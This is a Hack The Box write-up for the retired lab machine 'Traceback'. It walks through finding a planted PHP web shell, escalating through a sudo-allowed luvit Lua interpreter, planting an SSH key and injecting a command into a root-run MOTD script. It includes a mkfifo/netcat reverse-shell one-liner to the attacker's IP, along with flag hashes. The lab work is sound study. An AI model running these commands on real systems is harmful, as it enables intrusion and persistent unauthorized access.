Hackthebox.eu - Retired - Traceback
Recon
As my normal. I start with a simple Up/Down scan on all TCP ports
Nmap -T4 -p- -oX ./nmapb.xml traceback.htb
Then I convert that to HTML to make it pretty
$ xsltproc ./nmapb.xml -o ./nmapb.html
Just three open ports 22, 80 and 8080
Let's scan again with the -A switch to try and finger OS/Service
$ nmap -T4 -p22,80,8080 -A -oX ./nmapf.xml traceback.htb
Then I convert that to HTML also
xsltproc ./nmapf.xml -o ./nmapf.html
Port 22 is a fairly recent openssh
80 is apache
8080 is something strange…
Lets see what we see on port 80
Looks like somebody has defaced the site
But they left us a backdoor? I think it might have something to do with port 8080 but let's run dirb just in case
Trying to browse to port 8080 we get nothing
What about this part of our nmap output?
Googling around for http-proxy socks5 I eventually found this page
https://www.systutorials.com/proxy-using-ssh-tunnel/
It talks about setting up an SSH proxy
What happens if we try to SSH into port 80
Cool there is SSH there…
What was the hackers name again?
Oh yeah its right the in the screenshot
XH4H
Dirb wasn't very helpful
But this line in source code looks like a thread we should pull
I popped that into google and found this github
https://github.com/TheBinitGhimire/Web-Shells
I wonder if these shells might be what the hacker means back they left a backdoor
I just copied and pasted each one to see if it was in the root dir…
After almost exhausting the list we got this
Looking at the code for this shell the default creds are admin/admin
Let's try it
Yup
While I haven't exploited the system yet. Let's move over to the exploitation section or I'm going to feel dirty
Exploit
Ok so we got a shell cool
Let's poke around the OS and see what we can find
Here is the bash history for webadmin
Lua
Here is sudo -l
Webadmin can run this luvit application as sysadmin with no password
Let's grab a better shell than this PHP webshell
Let's listen on 5555 on our kali box
And run mkfifo on the web shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 5555 >/tmp/f
Lets see what that application we found earlier does
$ sudo -u sysadmin /home/sysadmin/luvit
Googling around for luvit lands us here
Using the Node-Style APIs
The luvit CLI tool can be used as a scripting platform just like node. This can be used to run lua scripts as standalone servers, clients, or other tools.
…. That sounds really interesting. I wonder if we can use a lua script to get a reverse shell as sysadmin..
So here is the easiest thing I can think to do is just have a lua script that can spawn a new shell as sysadmin
I created Lua script with this inside
os.execute('/bin/sh')
Then used python SimpleHTTPServer and wget to move it over to the traceback
On kali
/Desktop/HTB/traceback$ python -m SimpleHTTPServer 8080
On traceback
http://10.10.14.30:8080/Esc.lua
Then we use sudo to call the file Esc.lua as sysadmin
sudo -u sysadmin /home/sysadmin/luvit /tmp/circusmonkey/Esc.lua
Alright alright alright
Let's get our user hash
cat user.txt
c24349701ae38c33ffbf0cceb2c46020
I created a new folder under tmp (because I'm too lazy to deal with the folder permissions we created with the webadmin user)
Mkdir /tmp/circusmonkey2
Let's use SimpleHTTPServer to transfer linEnum.sh over to traceback to see if we can find any misconfiguration we might find
We need to give this script execution rights
Chmod +x ./LinEnum.sh
This part of the running processes caught my attention
Looks like there is a running process as root that copies everything over from /var/backsups/.update-motd.d to /etc/update-motd.d
This looks like a process that is meant to keep the /etc/update-motd.d folder from being messed with.
Every 30 seconds it resotes the file to a version that was backed up
MOTD… Things bring me back to my net admin days.. Setting the MOTD banner on cisco ios..
MOTD stands
for Message of the Day.
fa
sd
sdaf
This is a message that can be displayed on a ssh or telnet session(among other services). There can be a couple of different banner one that is a warning banner that can be displayed preauthentication and another that you will see after you authenticate.
Let's check out the folder that is being overwritten
Ooooooohhhhhh the sysadmin group has write access to this….
Let's check out the 00-header file
See that last part
Welcome to Xh4Hland
Let's try to connect up using SSH to see if that is the message we get when we ssh in
Well that's not the same message….
Maybe our message is behind authentication. Let's put our ssh key in the authrozied_keys for sysadmin and see if we get a different message after we gain access.
Let's start by generating our private and public keys
$ ssh-keygen -t rsa
This makes a private and public key for us..
It puts the public key in the directory we ran the command from
Since this is a live box and there are other users trying to root this box.. I don't want to overwrite the authorized_keys file for sysadmin
So let's add some padding to our public key so we have a bit of spaces in between
$ (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > pubkey.txt
Now we can use >> to add this to the authorzied_keys file
On our shell
Cd /home/sysadmin/.ssh
echo "
ssh-rsa AA*************************************************************************************************************************************************************************************************************************************** circusmonkey@kali
" >> authorized_keys
This should put our key at the bottom of the authroized_keys file
Now let's try to ssh with our private key
And there is that string we say in the 00-header file.
Let's edit the file to print out the root flag
Cd /etc/update-motd.d
$ echo " cat /root/root.txt " >> 00-header
Then we'll cat the file to make sure it did put our cat in there.
Yup it's there let's open another terminal and try to ssh again
And there is our hash…. Since HTB is now rotating the hashes after every reset I'm not going to blur out the hash anymore since it shouldn't work by the time this goes public.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
c37bcae2b8b1cd4ed4addc68f243e1b0
Comments
Post a Comment